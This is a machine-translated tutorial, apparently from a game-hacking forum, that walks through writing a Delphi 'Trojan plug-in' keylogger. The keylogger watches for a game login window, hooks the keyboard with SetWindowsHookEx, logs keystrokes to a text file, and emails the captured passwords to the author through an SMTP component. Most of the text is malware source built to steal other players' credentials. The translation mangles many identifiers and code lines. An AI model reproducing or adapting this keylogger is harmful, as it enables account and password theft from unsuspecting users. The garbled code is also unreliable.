Previously introduced the action, the local modified plug-in is a true plug-in, and today, the Trojan plug-in, which may introduce it, may be like Trojans, it is to help the plug-in person to steal the account and password of others. east. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology. We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window. 2. Judging whether the login window appears. 3. If the login window appears, log the keyboard. 4. When the window is closed, the record information is sent to the programmer's mailbox. I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation: So how do we judge whether the login window does not appear? In fact, this is very simple, we can realize it with the FindWindow function: hWnd FindWindow
LPCTSTSTR LPCLASSNAME, / / POINTER TO Class Name LPCTSTSTSTSTS WINDOWNAME / / POINTER TO WINDOWNAME); In actual program implementation, we have to find the 'xx' window, use FindWindow (NIL, 'XX') if the return value is greater than 0 The window has appeared, then we can record the keyboard information. First, we use the SETWINDOWSHOKEX to set up the monitor log, and the usage of this function is as follows: hHOOK SETWINDOWSHOKEX (
int idHook, // type of hook to install HOOKPROC lpfn, // address of hook procedure HINSTANCE hMod, // handle of application instance DWORD dwThreadId // identity of thread to install hook for); here to note is that in our program In the case of HookProc, we must implement it by writing a function, Hinstance here, we can use this program's Hinstance, specific implementation methods: hHOOK: = SETWINDOWSHOKEX (wh_journalrRecord, hookproc, hinstance, 0); and HookProc The function must be complex: function hookproc (icode: integer; wparam: wparam; lparam: lparam): LRESULT; stdcall; begin if FindTitle1 file: // If the window is discovered Begin if (peventmsg (lparam) ^. Message = wm_keydown) THEN FILE: // Message is equal to keyboard Press hookKey: = hookkey form1.keyhookresult (peventmsg (lparam) ^. paraml, peventmsg (lparam) ^. paramh); file: // via keyhookresult (customized Function, the main function is to convert the intercepted message parameters as the button name. I will convert the conversion function at the end of the article. If Length> 0 THEN FILE: // If you get the key name begin write (hookkeyfile, hookkey); file: // write the button name to the text file hookkey: = '; end; end; end; or more is record The entire process of the keyboard, simple, if you record it, don't forget to release it, UnHookWindowshookex (HHOOK), and hHOOK, the handle returned after setting SetWindowsHookex. We have got a record of the keyboard, so now, just send the recorded information back, we have caused it. Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi.
The code is as follows: assignfile (readfile, 'hook.txt'); file: // Open hook.txt This text file reset (READFILE); file: // Set to a way to read how much not Eof (readfile) Do File: / / When you do not read the file tail becom readln (readfile, s, j); file: // read file line body: = body s; end; firly closefile; file: // Turn file end; nmsmtp1. EncodeType: = UUMIME; File: // Set the encoded nmsmtp1.postMessage.attachments.text: = '; file: // Set attachment nmsmtp1.postMessage.Fromaddress: =' xxx@xxx.com '; file: // Set source Email address nmsmtp1.postMSMTMTP1.TEXT: = 'xxx@xxx.com'; / set target email address nmsmtp1.postMessage.body.text: = 'password' '' body; file: // Set mail content NMSMTP1 .PostMessage.subject: = 'password'; file: // Set the mail title nmsmtp1.sendmail; file: // Send mail This program has been implemented, edited try ~~~ Right, I used to write similar Works can be found on www.playicq.com. (In fact, it is not difficult to do such a Dongdong. Basically, it is not what technical can be said. I hope that I will not be able to apply it everywhere after my article ~~~~ Little life is a gift ~~~) Copyright Description: You can Free copy, distribute, download this document. However, you may not take it, change this article, or use this article to see any form of interest.
